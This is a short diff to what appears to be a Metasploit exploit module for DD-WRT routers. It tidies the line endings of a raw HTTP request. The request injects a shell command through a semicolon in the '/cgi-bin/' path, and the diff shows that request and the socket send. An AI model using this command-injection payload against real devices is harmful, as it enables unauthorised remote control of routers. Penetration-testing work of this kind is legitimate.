diff --git a/modules/exploits/linux/http/ddwrt_cgibin_exec.rb b/modules/exploits/linux/http/ddwrt_cgibin_exec.rb index 124b5237fc..5e32738ca4 100644 --- a/modules/exploits/linux/http/ddwrt_cgibin_exec.rb +++ b/modules/exploits/linux/http/ddwrt_cgibin_exec.rb @@ -67,8 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote req = "GET /cgi-bin/;#{str} HTTP/1.1\r\n" + "Host: #{rhost}\r\n" + - "Content-Length: 0\r\n" + - "\r\n\r\n" + "Content-Length: 0\r\n\r\n" print_status("Sending GET request with encoded command line...") sock.put(req)